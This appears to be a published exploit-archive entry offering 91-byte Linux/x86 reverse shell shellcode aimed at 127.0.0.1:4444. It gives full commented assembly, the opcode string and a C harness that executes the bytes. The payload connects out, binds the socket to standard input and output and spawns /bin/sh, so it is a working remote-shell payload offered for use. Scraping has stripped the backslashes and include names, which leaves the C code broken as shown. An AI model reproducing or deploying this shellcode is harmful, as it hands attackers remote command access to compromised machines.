91 bytes small Linux/x86 reverse shell NULL free 127.0.0.1:4444 shellcode.

MD5 | 3db8a3b1f503151d8569756ef3829a15

# Exploit Title: Linux/x86 - Reverse Shell NULL free 127.0.0.1:4444 Shellcode (91 bytes)
# Date: 2019-10-16
# Author: bolonobolo
# Tested on: Linux x86
# Software: N/A
# CVE: N/A

/*
global _start

section .text
_start:


;socket()
xor ecx, ecx ; xoring ECX
xor ebx, ebx ; xoring EBX
mul ebx ; xoring EAX and EDX
inc cl ; ECX should be 1
inc bl
inc bl ; EBX should be 2
mov ax, 0x167 ;
int 0x80 ; call socket()

;connect() ; move the return value of socket
xchg ebx, eax ; from EAX to EBX ready for the next syscalls

; push sockaddr structure in the stack
dec cl
push ecx ; unused char (0)

; move the lenght (16 bytes) of IP in EDX
mov dl, 0x16

; the ip address 1.0.0.127 could be 4.3.3.130 to avoid NULL bytes
mov ecx, 0x04030382 ; mov ip in ecx
sub ecx, 0x03030303 ; subtract 3.3.3.3 from ip
push ecx ; load the real ip in the stack
push word 0x5c11 ; port 4444
push word 0x02 ; AF_INET family
lea ecx, [esp]
; EBX still contain the value of the
opened socket
mov ax, 0x16a
int 0x80

; dup2()
xor ecx, ecx
mov cl, 0x3

dup2:
xor eax, eax
; EBX still contain the value of the
opened socket
mov al, 0x3f
dec cl
int 0x80
jnz dup2

; execve() from the previous polymorphic analysis 25 bytes
cdq ; xor edx
mul edx ; xor eax
lea ecx, [eax] ; xor ecx
mov esi, 0x68732f2f
mov edi, 0x6e69622f
push ecx ; push NULL in stack
push esi ; push hs/ in stack
push edi ; push nib// in stack
lea ebx, [esp] ; load stack pointer to ebx
mov al, 0xb ; load execve in eax
int 0x80
*/

#include
#include

unsigned char code[] =
"x31xc9x31xdbxf7xe3xfexc1xfexc3xfexc3x66xb8x67x01xcdx80x93xfexc9x51xb2x16xb9x82x03x03x04x81xe9x03x03x03x03x51x66x68x11x5cx66x6ax02x8dx0cx24x66xb8x6ax01xcdx80x31xc9xb1x03x31xc0xb0x3fxfexc9xcdx80x75xf6x99xf7xe2x8dx08xbex2fx2fx73x68xbfx2fx62x69x6ex51x56x57x8dx1cx24xb0x0bxcdx80";

void main()
{

printf("Shellcode Length: %dn", strlen(code));

int (*ret)() = (int(*)())code;

ret();

}

Source